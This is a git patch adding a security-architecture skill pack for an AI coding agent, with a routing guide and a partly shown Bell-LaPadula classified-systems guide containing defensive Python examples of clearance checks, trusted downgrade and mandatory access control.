From 4fad9f51e1e66de109d645d4dcce811d8d861f80 Mon Sep 17 00:00:00 2001 From: Zhongwei Li Date: Sun, 30 Nov 2025 08:59:46 +0800 Subject: [PATCH] Initial commit --- .claude-plugin/plugin.json | 12 + README.md | 3 + plugin.lock.json | 77 ++ skills/using-security-architect/SKILL.md | 353 ++++++++ .../classified-systems-security.md | 632 +++++++++++++++ .../compliance-awareness-and-mapping.md | 563 +++++++++++++ .../documenting-threats-and-controls.md | 620 ++++++++++++++ .../secure-by-design-patterns.md | 497 ++++++++++++ .../security-architecture-review.md | 433 ++++++++++ ...ecurity-authorization-and-accreditation.md | 757 ++++++++++++++++++ .../security-controls-design.md | 537 +++++++++++++ .../threat-modeling.md | 565 +++++++++++++ 12 files changed, 5049 insertions(+) create mode 100644 .claude-plugin/plugin.json create mode 100644 README.md create mode 100644 plugin.lock.json create mode 100644 skills/using-security-architect/SKILL.md create mode 100644 skills/using-security-architect/classified-systems-security.md create mode 100644 skills/using-security-architect/compliance-awareness-and-mapping.md create mode 100644 skills/using-security-architect/documenting-threats-and-controls.md create mode 100644 skills/using-security-architect/secure-by-design-patterns.md create mode 100644 skills/using-security-architect/security-architecture-review.md create mode 100644 skills/using-security-architect/security-authorization-and-accreditation.md create mode 100644 skills/using-security-architect/security-controls-design.md create mode 100644 skills/using-security-architect/threat-modeling.md diff --git a/.claude-plugin/plugin.json b/.claude-plugin/plugin.json new file mode 100644 index 0000000..02ee8e3 --- /dev/null +++ b/.claude-plugin/plugin.json @@ -0,0 +1,12 @@ +{ + "name": "ordis-security-architect", + "description": "Threat modeling, security controls, compliance, ATO - 9 comprehensive security skills", + "version": "1.0.1", + "author": { + "name": "tachyon-beep", 
+ "url": "https://github.com/tachyon-beep" + }, + "skills": [ + "./skills" + ] +} \ No newline at end of file diff --git a/README.md b/README.md new file mode 100644 index 0000000..100ad07 --- /dev/null +++ b/README.md @@ -0,0 +1,3 @@ +# ordis-security-architect + +Threat modeling, security controls, compliance, ATO - 9 comprehensive security skills diff --git a/plugin.lock.json b/plugin.lock.json new file mode 100644 index 0000000..e88369a --- /dev/null +++ b/plugin.lock.json @@ -0,0 +1,77 @@ +{ + "$schema": "internal://schemas/plugin.lock.v1.json", + "pluginId": "gh:tachyon-beep/skillpacks:plugins/ordis-security-architect", + "normalized": { + "repo": null, + "ref": "refs/tags/v20251128.0", + "commit": "2b527ed26da43532f4fad648befa2e8f60611800", + "treeHash": "7d110866bbf87f7ea40dd0982cb8a2873b537e6a29de50d70b194e8b39034aed", + "generatedAt": "2025-11-28T10:28:33.210892Z", + "toolVersion": "publish_plugins.py@0.2.0" + }, + "origin": { + "remote": "git@github.com:zhongweili/42plugin-data.git", + "branch": "master", + "commit": "aa1497ed0949fd50e99e70d6324a29c5b34f9390", + "repoRoot": "/Users/zhongweili/projects/openmind/42plugin-data" + }, + "manifest": { + "name": "ordis-security-architect", + "description": "Threat modeling, security controls, compliance, ATO - 9 comprehensive security skills", + "version": "1.0.1" + }, + "content": { + "files": [ + { + "path": "README.md", + "sha256": "86b9b43aa7dac0fe85780250127ccac0cb0412481b9f2bf94b02ccd22dd7fc0f" + }, + { + "path": ".claude-plugin/plugin.json", + "sha256": "85abc799c8768a6111a95741f765c617d8665885ce18a0e79877d3a714fb5ac4" + }, + { + "path": "skills/using-security-architect/security-architecture-review.md", + "sha256": "3a88ebda527725c71638289683dc8065e30455c43a9b5d2346efd87bdd03fa91" + }, + { + "path": "skills/using-security-architect/threat-modeling.md", + "sha256": "ccb8aafbc6ba19ffbbc49eaaccce2f2d7965ebc116b1042bf77c30b39bd1a3cb" + }, + { + "path": 
"skills/using-security-architect/security-controls-design.md", + "sha256": "3d92f1e4504df0af9413049e61ed23c02ce36324b377eb826f7902160f1a0fab" + }, + { + "path": "skills/using-security-architect/security-authorization-and-accreditation.md", + "sha256": "f2976a1c9e809e57176e6faa8e6d05dd0df599feed7592c8ff39c4d9da71ef77" + }, + { + "path": "skills/using-security-architect/classified-systems-security.md", + "sha256": "573fc1ebf064fea1d773084d5a856a38f2d2a2f75e30e283714ff58417f825f9" + }, + { + "path": "skills/using-security-architect/compliance-awareness-and-mapping.md", + "sha256": "3f518d89a072b55ab42019c856131b247657149f037779f1ddb1fbf572b2e5ed" + }, + { + "path": "skills/using-security-architect/secure-by-design-patterns.md", + "sha256": "fef561acb61e5dad99b31ebef436786a728c74732d93d0505cd5c60e31117a42" + }, + { + "path": "skills/using-security-architect/SKILL.md", + "sha256": "289523c06f2ecf5ee0cb34a9a4505217a652a4589c750129c7c70c9f1038e9d9" + }, + { + "path": "skills/using-security-architect/documenting-threats-and-controls.md", + "sha256": "f408f1bc3af45d77c1ce8151046593eee6f93fcda611ffda6ad274048d676154" + } + ], + "dirSha256": "7d110866bbf87f7ea40dd0982cb8a2873b537e6a29de50d70b194e8b39034aed" + }, + "security": { + "scannedAt": null, + "scannerVersion": null, + "flags": [] + } +} \ No newline at end of file diff --git a/skills/using-security-architect/SKILL.md b/skills/using-security-architect/SKILL.md new file mode 100644 index 0000000..311905d --- /dev/null +++ b/skills/using-security-architect/SKILL.md @@ -0,0 +1,353 @@ +--- +name: using-security-architect +description: Routes to security architecture skills - threat modeling, controls, compliance, authorization +mode: true +--- + +# Using Security Architect + +## Overview + +This meta-skill routes you to the right security architecture skills based on your situation. Load this skill when you need security expertise but aren't sure which specific security skill to use. 
+ +**Core Principle**: Different security tasks require different skills. Match your situation to the appropriate skill, load only what you need. + +## When to Use + +Load this skill when: +- Starting any security-related task +- User mentions: "security", "threat", "authentication", "authorization", "compliance", "classified", "review this design" +- You recognize security implications but unsure which skill applies +- You need to document security decisions + +**Don't use for**: Simple features with no security implications (e.g., UI styling, basic CRUD with existing auth) + +## Routing by Situation + +### New System Design + +**Symptoms**: "Design a new...", "We're building...", "Greenfield project" + +**Route to**: +1. **First**: [threat-modeling.md](threat-modeling.md) - Identify threats before implementation +2. **Then**: [secure-by-design-patterns.md](secure-by-design-patterns.md) - Design with security built-in +3. **Then**: [security-controls-design.md](security-controls-design.md) - Select appropriate controls + +**Example**: "Design authentication system" → Load all three in order + +--- + +### Existing System Review + +**Symptoms**: "Review this design", "Security audit", "Does this look secure?" 
+ +**Route to**: [security-architecture-review.md](security-architecture-review.md) + +**When to add**: +- Add [threat-modeling.md](threat-modeling.md) if design lacks threat analysis +- Add [secure-by-design-patterns.md](secure-by-design-patterns.md) if architecture has gaps + +**Example**: "Review this plugin system" → Load [security-architecture-review.md](security-architecture-review.md) + +--- + +### Specific Security Domains + +#### Authentication/Authorization Design +**Route to**: +- [threat-modeling.md](threat-modeling.md) (identify auth threats) +- [secure-by-design-patterns.md](secure-by-design-patterns.md) (defense-in-depth, fail-secure) +- Consider: [security-authorization-and-accreditation.md](security-authorization-and-accreditation.md) (if government/ATO needed) + +#### Configuration & Secrets +**Route to**: +- [threat-modeling.md](threat-modeling.md) (config tampering threats) +- [security-controls-design.md](security-controls-design.md) (separation of config vs code) + +#### API Security +**Route to**: +- [threat-modeling.md](threat-modeling.md) (STRIDE on API endpoints) +- [security-architecture-review.md](security-architecture-review.md) (review access controls) + +--- + +### Specialized Contexts (Extensions) + +#### Classified/High-Security Systems + +**Symptoms**: "TOP SECRET", "classified data", "security clearances", "multi-level security", "Bell-LaPadula" + +**Route to**: +1. [classified-systems-security.md](classified-systems-security.md) (REQUIRED for classified contexts) +2. 
Plus core skills: [threat-modeling.md](threat-modeling.md), [secure-by-design-patterns.md](secure-by-design-patterns.md) + +**Example**: "Design system handling SECRET and UNCLASSIFIED" → Load [classified-systems-security.md](classified-systems-security.md) first + +--- + +#### Compliance/Regulatory + +**Symptoms**: "HIPAA", "PCI-DSS", "SOC2", "GDPR", "compliance audit", "regulatory requirements" + +**Route to**: [compliance-awareness-and-mapping.md](compliance-awareness-and-mapping.md) + +**When to add**: +- Add [security-authorization-and-accreditation.md](security-authorization-and-accreditation.md) if ATO/AIS needed +- Add core skills for implementing compliant controls + +**Example**: "Build HIPAA-compliant system" → Load [compliance-awareness-and-mapping.md](compliance-awareness-and-mapping.md) + [threat-modeling.md](threat-modeling.md) + +--- + +#### Government Authorization + +**Symptoms**: "ATO", "AIS", "authority to operate", "SSP", "SAR", "POA&M", "FedRAMP", "FISMA" + +**Route to**: [security-authorization-and-accreditation.md](security-authorization-and-accreditation.md) + +**Cross-reference**: Load `muna/technical-writer/operational-acceptance-documentation` for SSP/SAR writing + +--- + +### Documentation Tasks + +**Symptoms**: "Document security decisions", "Write security docs", "Explain threat model" + +**Route to**: [documenting-threats-and-controls.md](documenting-threats-and-controls.md) + +**Cross-faction reference**: Load `muna/technical-writer/documentation-structure` for ADR format, clarity guidelines + +**Example**: "Document why we chose MLS" → Load [documenting-threats-and-controls.md](documenting-threats-and-controls.md) + documentation-structure + +--- + +## Core vs Extension Skills + +### Core Skills (Universal - Use for Any Project) + +Load these for **any** project with security needs: + +- [threat-modeling.md](threat-modeling.md) - Identify threats (STRIDE, attack trees) +- [security-controls-design.md](security-controls-design.md) - 
Design controls (defense-in-depth, fail-secure) +- [security-architecture-review.md](security-architecture-review.md) - Review designs for security gaps +- [secure-by-design-patterns.md](secure-by-design-patterns.md) - Apply secure design patterns +- [documenting-threats-and-controls.md](documenting-threats-and-controls.md) - Document security decisions + +### Extension Skills (Specialized - Use for Specific Contexts) + +Load these **only** when context requires: + +- [classified-systems-security.md](classified-systems-security.md) - Handling classified/sensitive data with clearances +- [compliance-awareness-and-mapping.md](compliance-awareness-and-mapping.md) - Regulatory compliance (HIPAA, PCI-DSS, GDPR, etc.) +- [security-authorization-and-accreditation.md](security-authorization-and-accreditation.md) - Government ATO/AIS processes + +**Decision**: If you're unsure whether context is "specialized", start with core skills. Specialized contexts will be explicit in requirements. + +--- + +## Decision Tree + +``` +Is this security-related? +├─ No → Don't load security skills +└─ Yes → Continue + +What's the situation? +├─ New system design → threat-modeling + secure-by-design-patterns + security-controls-design +├─ Reviewing existing → security-architecture-review +├─ Documenting security → documenting-threats-and-controls + muna/technical-writer/documentation-structure +└─ Domain-specific → See "Specific Security Domains" above + +Is this a specialized context? 
+├─ Classified data → ADD: classified-systems-security +├─ Compliance required → ADD: compliance-awareness-and-mapping +├─ Government ATO → ADD: security-authorization-and-accreditation +└─ No → Core skills sufficient +``` + +--- + +## Cross-Faction References + +Security work often requires skills from other factions: + +**Muna (Documentation)**: +- `muna/technical-writer/documentation-structure` - When documenting security (ADRs, SSPs) +- `muna/technical-writer/clarity-and-style` - When explaining security to non-experts + +**Load both factions when**: Documenting security decisions, writing security policies, explaining threats to stakeholders + +--- + +## Common Routing Patterns + +### Pattern 1: New Authentication System +``` +User: "Design authentication with passwords and OAuth" +You: Loading threat-modeling + secure-by-design-patterns + security-controls-design +``` + +### Pattern 2: Design Review +``` +User: "Review this plugin security design" +You: Loading security-architecture-review +``` + +### Pattern 3: Classified System +``` +User: "Build system handling TOP SECRET data" +You: Loading classified-systems-security + threat-modeling + secure-by-design-patterns +``` + +### Pattern 4: Compliance Project +``` +User: "Build HIPAA-compliant patient portal" +You: Loading compliance-awareness-and-mapping + threat-modeling + security-controls-design +``` + +### Pattern 5: Security Documentation +``` +User: "Document our MLS security decisions" +You: Loading documenting-threats-and-controls + muna/technical-writer/documentation-structure +``` + +--- + +## When NOT to Load Security Skills + +**Don't load security skills for**: +- UI styling (colors, fonts, layouts) +- Basic CRUD with existing, tested auth +- Non-security refactoring (renaming variables, extracting functions) +- Documentation that isn't security-related + +**Example**: "Add dark mode toggle to settings" → No security skills needed (unless settings include security-sensitive preferences) + +--- + 
+## Quick Reference Table + +| Task Type | Load These Skills | Notes | +|-----------|------------------|-------| +| **New system design** | threat-modeling, secure-by-design-patterns, security-controls-design | Load in order | +| **Design review** | security-architecture-review | Add threat-modeling if no threat analysis exists | +| **Authentication** | threat-modeling, secure-by-design-patterns | Consider security-authorization-and-accreditation if ATO needed | +| **API security** | threat-modeling, security-architecture-review | Apply STRIDE to endpoints | +| **Classified data** | classified-systems-security + core skills | Extension required | +| **Compliance** | compliance-awareness-and-mapping + core skills | Extension for regulatory contexts | +| **Government ATO** | security-authorization-and-accreditation + core skills | Extension for ATO/AIS | +| **Document security** | documenting-threats-and-controls, muna/technical-writer/documentation-structure | Cross-faction | + +--- + +## Common Mistakes + +### ❌ Loading All Skills at Once +**Wrong**: Load all 8 security-architect skills for every security task +**Right**: Load only the skills your situation needs (use decision tree) + +### ❌ Skipping Threat Modeling +**Wrong**: Jump straight to implementation for new security features +**Right**: Always threat model first for new systems/features + +### ❌ Using Core Skills for Specialized Contexts +**Wrong**: Use generic threat modeling for classified systems +**Right**: Load classified-systems-security for MLS contexts + +### ❌ Not Cross-Referencing Muna +**Wrong**: Write security docs without documentation structure skills +**Right**: Load both ordis/security-architect/documenting-threats-and-controls + muna/technical-writer/documentation-structure + +--- + +## Examples + +### Example 1: Payment Processing System + +``` +User: "Design a payment processing microservice" + +Your routing: +1. Recognize: New system + financial domain → security critical +2. Load: threat-modeling (identify payment-specific threats) +3. 
Load: secure-by-design-patterns (encryption, secrets management) +4. Load: security-controls-design (PCI-DSS controls) +5. Consider: compliance-awareness-and-mapping (PCI-DSS is a compliance requirement) +``` + +### Example 2: Simple Feature (No Security Needed) + +``` +User: "Add a favorites button to the UI" + +Your routing: +1. Recognize: UI feature, uses existing auth, no new security surface +2. Decision: No security skills needed +3. Proceed with standard implementation +``` + +### Example 3: Classified System Architecture + +``` +User: "Review architecture for system handling SECRET and UNCLASSIFIED data" + +Your routing: +1. Recognize: Classified context (SECRET mentioned) + review task +2. Load: classified-systems-security (MLS patterns required) +3. Load: security-architecture-review (review process) +4. Load: threat-modeling (if threats not already modeled) +``` + +--- + +## Phase 1 Note + +**Currently Available** (Phase 1): +- ✅ `using-security-architect` (this skill) +- ✅ `threat-modeling` (in progress) + +**Coming Soon** (Phases 2-3): +- `security-controls-design` +- `security-architecture-review` +- `secure-by-design-patterns` +- `classified-systems-security` +- `compliance-awareness-and-mapping` +- `security-authorization-and-accreditation` +- `documenting-threats-and-controls` + +**For Phase 1**: Focus on threat-modeling as primary skill. Reference other skills by name even though they're not implemented yet - this tests the routing logic. + +--- + +## Summary + +**This skill maps your situation → specific security skills to load.** + +1. Identify your situation (new system, review, specialized context) +2. Use decision tree to find applicable skills +3. Load core skills for universal needs +4. Add extension skills for specialized contexts +5. Cross-reference Muna for documentation needs +6. Don't load security skills when not needed + +**Meta-rule**: When in doubt, start with [threat-modeling.md](threat-modeling.md). Threats drive everything else. 
+ +--- + +## Security Architect Specialist Skills Catalog + +After routing, load the appropriate specialist skill for detailed guidance: + +### Core Skills (Universal) + +1. [threat-modeling.md](threat-modeling.md) - STRIDE analysis, attack trees, threat identification, security-critical systems analysis +2. [secure-by-design-patterns.md](secure-by-design-patterns.md) - Defense-in-depth, fail-secure design, least privilege, separation of concerns +3. [security-controls-design.md](security-controls-design.md) - Control selection, defense layering, encryption, secrets management +4. [security-architecture-review.md](security-architecture-review.md) - Design review process, security gap analysis, architecture evaluation +5. [documenting-threats-and-controls.md](documenting-threats-and-controls.md) - Security documentation, threat model writing, control documentation + +### Extension Skills (Specialized Contexts) + +6. [classified-systems-security.md](classified-systems-security.md) - Multi-level security (MLS), Bell-LaPadula, classified data handling, security clearances +7. [compliance-awareness-and-mapping.md](compliance-awareness-and-mapping.md) - HIPAA, PCI-DSS, SOC2, GDPR, regulatory mapping, compliance frameworks +8. [security-authorization-and-accreditation.md](security-authorization-and-accreditation.md) - ATO/AIS processes, SSP/SAR, POA&M, FedRAMP, FISMA, government authorization diff --git a/skills/using-security-architect/classified-systems-security.md b/skills/using-security-architect/classified-systems-security.md new file mode 100644 index 0000000..36db428 --- /dev/null +++ b/skills/using-security-architect/classified-systems-security.md @@ -0,0 +1,632 @@ + +# Classified Systems Security + +## Overview + +Implement multi-level security (MLS) for classified data. Core principle: **Invalid configurations must be impossible to create, not detected at runtime**. + +**Key insight**: You cannot "sanitize" your way out of classification violations. 
Use mandatory access control (MAC) with fail-fast validation at construction time. + +## When to Use + +Load this skill when: +- Handling classified data (UNOFFICIAL, OFFICIAL, SECRET, TOP SECRET) +- Implementing government/defense systems +- Designing multi-level security (MLS) architectures +- Processing data at different classification levels + +**Symptoms you need this**: +- "How do I handle SECRET and UNOFFICIAL data in the same pipeline?" +- Designing systems with clearance levels +- Government/defense contract requirements +- Data classification enforcement + +**Don't use for**: +- General security (use `ordis/security-architect/security-controls-design`) +- Non-classified sensitivity levels (use standard access control) + +## Bell-LaPadula MLS Model + +### The Two Rules + +**1. No Read Up (Simple Security Property)** +- Subject cannot read data at higher classification +- UNOFFICIAL component CANNOT read OFFICIAL data +- OFFICIAL component CANNOT read SECRET data + +**2. No Write Down (*-Property/Star Property)** +- Subject cannot write data to lower classification +- SECRET component CANNOT write to OFFICIAL sink +- OFFICIAL component CANNOT write to UNOFFICIAL sink + +### Classification Hierarchy + +``` +TOP SECRET (highest) + ↓ + SECRET + ↓ + PROTECTED + ↓ +OFFICIAL:SENSITIVE + ↓ + OFFICIAL + ↓ +UNOFFICIAL (lowest) +``` + +**Transitivity**: Data derived from SECRET is SECRET until formally declassified. 
+ +### Example: Violations + +❌ **Read-Up Violation**: +```python +# OFFICIAL clearance component reading SECRET data +official_processor = Processor(clearance=SecurityLevel.OFFICIAL) +secret_source = DataSource(classification=SecurityLevel.SECRET) + +# VIOLATION: Cannot read up from OFFICIAL to SECRET +data = official_processor.read(secret_source) # ❌ FORBIDDEN +``` + +❌ **Write-Down Violation**: +```python +# SECRET component writing to OFFICIAL sink +secret_processor = Processor(clearance=SecurityLevel.SECRET) +official_sink = DataSink(classification=SecurityLevel.OFFICIAL) + +# VIOLATION: Cannot write down from SECRET to OFFICIAL +secret_processor.write(data, official_sink) # ❌ FORBIDDEN +``` + +✅ **Compliant Flow**: +```python +# Same clearance level throughout +secret_source = DataSource(classification=SecurityLevel.SECRET) +secret_processor = Processor(clearance=SecurityLevel.SECRET) +secret_sink = DataSink(classification=SecurityLevel.SECRET) + +# ✅ ALLOWED: All components at SECRET level +pipeline = Pipeline(secret_source, secret_processor, secret_sink) +``` + + +## Fail-Fast Construction-Time Validation + +### Principle: Prevent Invalid Configurations + +**Don't**: Detect violations at runtime (after data exposure) +**Do**: Reject invalid configurations at construction time (before data access) + +### Construction vs Runtime Validation + +❌ **Runtime Validation (Vulnerable)**: +```python +class Pipeline: + def __init__(self, source, processor, sink): + self.source = source + self.processor = processor + self.sink = sink + + def run(self): + # Runtime check - TOO LATE! + data = self.source.read() + if data.classification > self.processor.clearance: + raise SecurityError("Read-up violation") + + # Problem: Data already read from source before check + # Exposure window = time between read() and check +``` + +**Issue**: Data already accessed before violation detected. 
+ +✅ **Fail-Fast Construction-Time (Secure)**: +```python +class Pipeline: + def __init__(self, source, processor, sink): + # Validate BEFORE creating pipeline + self._validate_clearances(source, processor, sink) + + self.source = source + self.processor = processor + self.sink = sink + + def _validate_clearances(self, source, processor, sink): + # Check no-read-up + if source.classification > processor.clearance: + raise SecurityError( + f"Read-up violation: Processor clearance {processor.clearance} " + f"cannot read source classified {source.classification}" + ) + + # Check no-write-down + if processor.clearance > sink.classification: + raise SecurityError( + f"Write-down violation: Processor {processor.clearance} " + f"cannot write to sink classified {sink.classification}" + ) + + # All validations passed + + def run(self): + # Only callable if construction succeeded + data = self.source.read() + processed = self.processor.process(data) + self.sink.write(processed) + +# Usage: +try: + # Validation happens at construction + pipeline = Pipeline(secret_source, official_processor, unofficial_sink) + # ❌ Above line raises SecurityError - pipeline never created +except SecurityError as e: + print(f"Configuration rejected: {e}") + sys.exit(1) +``` + +**Result**: Zero exposure window. Invalid pipeline cannot be created. + + +## Type-System Enforcement + +### Classification-Aware Types + +Use type system to make violations impossible at compile/construction time. 
+ +```python +from typing import Generic, TypeVar +from enum import Enum + +class SecurityLevel(Enum): + UNOFFICIAL = 1 + OFFICIAL = 2 + OFFICIAL_SENSITIVE = 3 + PROTECTED = 4 + SECRET = 5 + TOP_SECRET = 6 + +# Generic type parameterized by classification +T = TypeVar('T', bound=SecurityLevel) + +class ClassifiedData(Generic[T]): + def __init__(self, data: any, classification: T): + self.data = data + self.classification = classification + +class DataSource(Generic[T]): + def __init__(self, classification: T): + self.classification = classification + + def read(self) -> ClassifiedData[T]: + return ClassifiedData(self._fetch(), self.classification) + +class Processor(Generic[T]): + def __init__(self, clearance: T): + self.clearance = clearance + + def process(self, data: ClassifiedData[T]) -> ClassifiedData[T]: + # Type system ensures data.classification <= self.clearance + return ClassifiedData(self._transform(data.data), data.classification) + +class DataSink(Generic[T]): + def __init__(self, classification: T): + self.classification = classification + + def write(self, data: ClassifiedData[T]): + # Type system ensures data.classification == self.classification + self._store(data.data) +``` + +**Type-safe pipeline**: +```python +# All components must be same classification level +secret_source: DataSource[SecurityLevel.SECRET] +secret_processor: Processor[SecurityLevel.SECRET] +secret_sink: DataSink[SecurityLevel.SECRET] + +# ✅ Type checker accepts this +pipeline = Pipeline(secret_source, secret_processor, secret_sink) + +# ❌ Type checker REJECTS this at compile time +official_processor: Processor[SecurityLevel.OFFICIAL] +pipeline = Pipeline(secret_source, official_processor, secret_sink) # Type error! +``` + + +## Trusted Downgrade Pattern + +### When Downgrading is Necessary + +Sometimes you need to declassify data (e.g., publishing redacted documents). This requires: + +1. **Formal Authority**: Authorized to declassify +2. 
**Explicit Process**: Manual review and approval +3. **Audit Trail**: Log all downgrade operations +4. **Trusted Service**: Part of Trusted Computing Base (TCB) + +### Trusted Downgrade Service + +```python +class TrustedDowngradeService: + """ + Trusted service operating at higher clearance level. + Part of Trusted Computing Base (TCB). + """ + def __init__(self, clearance: SecurityLevel): + self.clearance = clearance # Must be HIGH to read classified data + self._validate_authority() # Verify authorized to declassify + + def _validate_authority(self): + # Check this service has declassification authority + if not has_declassification_authority(self): + raise SecurityError("Service not authorized for declassification") + + def declassify( + self, + data: ClassifiedData, + target_level: SecurityLevel, + justification: str + ) -> ClassifiedData: + """ + Declassify data to lower classification level. + + Args: + data: Original classified data + target_level: Target classification (must be lower) + justification: Reason for declassification (audit trail) + + Returns: + Data at lower classification level + """ + # Validate this service can read the data + if data.classification > self.clearance: + raise SecurityError("Cannot declassify data above clearance") + + # Validate downgrade direction + if target_level >= data.classification: + raise SecurityError("Target must be lower than current classification") + + # Perform declassification (redaction, sanitization) + declassified_data = self._redact(data.data, target_level) + + # Audit trail + self._log_declassification( + original_level=data.classification, + target_level=target_level, + justification=justification, + timestamp=datetime.now() + ) + + # Return data at lower classification + return ClassifiedData(declassified_data, target_level) + + def _redact(self, data: any, target_level: SecurityLevel) -> any: + # Remove information inappropriate for target level + # This is where human review would occur in real 
systems + pass + + def _log_declassification(self, **kwargs): + # Immutable audit log + audit_log.append(kwargs) +``` + +### Trusted Downgrade in Pipeline + +```python +# Pipeline with trusted downgrade +secret_source = DataSource(SecurityLevel.SECRET) + +# Trusted service at SECRET level +downgrade_service = TrustedDowngradeService(clearance=SecurityLevel.SECRET) + +# Components at lower levels +official_processor = Processor(SecurityLevel.OFFICIAL) +unofficial_sink = DataSink(SecurityLevel.UNOFFICIAL) + +# Workflow: +def secure_pipeline(): + # 1. Read SECRET data (service has SECRET clearance) + secret_data = secret_source.read() + + # 2. Declassify to OFFICIAL (trusted service with authority) + official_data = downgrade_service.declassify( + secret_data, + SecurityLevel.OFFICIAL, + justification="Public release approval #12345" + ) + + # 3. Process at OFFICIAL level (no violation) + processed = official_processor.process(official_data) + + # 4. Declassify to UNOFFICIAL + unofficial_data = downgrade_service.declassify( + processed, + SecurityLevel.UNOFFICIAL, + justification="Redacted for public disclosure" + ) + + # 5. Write to UNOFFICIAL sink (no violation) + unofficial_sink.write(unofficial_data) +``` + +**Key points**: +- Downgrade service operates at HIGH clearance (can read classified data) +- Explicit declassification with justification (not implicit) +- Audit trail for every downgrade operation +- Manual review in production (automated only for specific patterns) + + +## Immutability Enforcement + +### Classification Cannot Be Reduced + +Once data is classified at a level, it cannot be reduced without formal declassification. + +❌ **Mutable Classification (Insecure)**: +```python +class Data: + def __init__(self, content, classification): + self.content = content + self.classification = classification # Mutable! 
+ +data = Data("secret info", SecurityLevel.SECRET) + +# ❌ Can be modified at runtime +data.classification = SecurityLevel.UNOFFICIAL # Forbidden! +``` + +✅ **Immutable Classification (Secure)**: +```python +from dataclasses import dataclass + +@dataclass(frozen=True) +class ClassifiedData: + """Immutable dataclass - classification cannot change.""" + content: str + classification: SecurityLevel + +data = ClassifiedData("secret info", SecurityLevel.SECRET) + +# ❌ Raises FrozenInstanceError +data.classification = SecurityLevel.UNOFFICIAL # Cannot modify! +``` + +### Derived Data Inherits Classification + +```python +def derive_data(original: ClassifiedData) -> ClassifiedData: + """ + Derived data has SAME classification as original. + Cannot be lower (information flow property). + """ + transformed = transform(original.content) + + # Derived data inherits original classification + return ClassifiedData(transformed, original.classification) + +# Example: +secret_data = ClassifiedData("secret", SecurityLevel.SECRET) +derived = derive_data(secret_data) + +assert derived.classification == SecurityLevel.SECRET # Always true +``` + + +## Minimum Security Level Computation + +### Pipeline-Wide Clearance + +Compute minimum clearance required across all components in pipeline. + +```python +def compute_pipeline_clearance(components: list) -> SecurityLevel: + """ + Compute minimum clearance needed to operate pipeline. + All components must have this clearance or higher. + """ + max_classification = SecurityLevel.UNOFFICIAL + + for component in components: + if hasattr(component, 'classification'): + # Data source/sink - sets required clearance + if component.classification > max_classification: + max_classification = component.classification + + return max_classification + +def validate_pipeline(components: list, processor_clearance: SecurityLevel): + """ + Validate processor clearance sufficient for pipeline. 
+ """ + required_clearance = compute_pipeline_clearance(components) + + if processor_clearance < required_clearance: + raise SecurityError( + f"Insufficient clearance: Processor has {processor_clearance}, " + f"pipeline requires {required_clearance}" + ) + + print(f"✓ Pipeline validated: Clearance {processor_clearance} sufficient") + +# Usage: +components = [ + DataSource(SecurityLevel.SECRET), + DataSink(SecurityLevel.OFFICIAL) +] + +processor = Processor(SecurityLevel.SECRET) + +# Validate at construction time +validate_pipeline(components, processor.clearance) # ✓ Passes + +processor_low = Processor(SecurityLevel.OFFICIAL) +validate_pipeline(components, processor_low.clearance) # ❌ Raises SecurityError +``` + + +## Mandatory Access Control (MAC) + +### MAC vs DAC + +**Discretionary Access Control (DAC)**: +- Owner controls access (chmod, ACLs) +- Users can grant access to others +- Examples: RBAC, file permissions + +**Mandatory Access Control (MAC)**: +- System enforces access based on security labels +- Users CANNOT override (not discretionary) +- Examples: SELinux, Bell-LaPadula + +### MAC for Classified Systems + +```python +class MandatoryAccessControl: + """ + Enforces Bell-LaPadula rules. + Users/processes CANNOT override. + """ + def __init__(self): + self.policy = BellLaPadulaPolicy() + + def check_read_access( + self, + subject_clearance: SecurityLevel, + object_classification: SecurityLevel + ) -> bool: + """ + No-read-up: Subject can only read at or below clearance. + """ + return subject_clearance >= object_classification + + def check_write_access( + self, + subject_clearance: SecurityLevel, + object_classification: SecurityLevel + ) -> bool: + """ + No-write-down: Subject can only write at or above clearance. + """ + return subject_clearance <= object_classification + + def enforce_access(self, operation: str, subject, object): + """ + Enforce MAC policy. Users cannot override. 
+ """ + if operation == "read": + if not self.check_read_access(subject.clearance, object.classification): + raise SecurityError(f"MAC violation: Read-up forbidden") + + elif operation == "write": + if not self.check_write_access(subject.clearance, object.classification): + raise SecurityError(f"MAC violation: Write-down forbidden") + + # Access granted + return True + +# Usage: +mac = MandatoryAccessControl() + +subject = Process(clearance=SecurityLevel.OFFICIAL) +secret_obj = Object(classification=SecurityLevel.SECRET) + +# ❌ Read-up violation - MAC enforces even if user wants access +mac.enforce_access("read", subject, secret_obj) # Raises SecurityError +``` + +**Key difference**: With DAC (RBAC), you could grant a role access. With MAC, no amount of permission grants can override clearance levels. + + +## Quick Reference: Decision Tree + +``` +Need to handle classified data? +│ +├─ Same classification level for all components? +│ └─→ ✓ Simple: All components at same level (e.g., all SECRET) +│ +├─ Different levels in same pipeline? +│ ├─ Can you redesign to separate pipelines? +│ │ └─→ ✓ Preferred: Separate SECRET and UNOFFICIAL pipelines +│ │ +│ └─ Must mix levels? +│ └─→ Use Trusted Downgrade Service +│ - Service operates at HIGH clearance +│ - Explicit declassification with justification +│ - Audit trail +│ - Manual review for authority +│ +└─ Validating pipeline security? + ├─ Runtime checks? ❌ Too late (exposure window) + └─ Construction-time validation? ✓ Correct (fail-fast) +``` + + +## Common Mistakes + +### ❌ Sanitization Instead of Declassification + +**Wrong**: "I'll strip SECRET fields and call it UNOFFICIAL" + +**Right**: Formal declassification requires: +- Authority to declassify +- Manual review of what can be released +- Audit trail +- Understanding of inference attacks (aggregate data can leak secrets) + +**Why**: You cannot automatically determine what's safe to declassify. Requires human judgment and authority. 
+ + +### ❌ Runtime Validation Only + +**Wrong**: Check clearances when processing data + +**Right**: Fail-fast at construction time before any data access + +**Why**: Runtime checks have exposure windows. Construction-time validation = zero exposure. + + +### ❌ Treating Clearances as Roles + +**Wrong**: "Just add a 'SECRET' role in RBAC" + +**Right**: Implement Mandatory Access Control (MAC) with Bell-LaPadula + +**Why**: Clearances are not discretionary. Users cannot grant access across classification levels. + + +### ❌ Mutable Classification + +**Wrong**: Allow classification field to be modified at runtime + +**Right**: Immutable dataclasses, frozen classification after assignment + +**Why**: Classification cannot decrease without formal declassification. + + +### ❌ Missing Information Flow Analysis + +**Wrong**: Focus only on direct access (can processor read source?) + +**Right**: Analyze full information flow (derived data inherits classification) + +**Why**: Data derived from SECRET is SECRET until declassified. + + +## Cross-References + +**Use WITH this skill**: +- `ordis/security-architect/secure-by-design-patterns` - Fail-fast validation pattern +- `ordis/security-architect/security-controls-design` - Defense-in-depth for classified systems + +**Use AFTER this skill**: +- `ordis/security-architect/security-architecture-review` - Review classified systems against 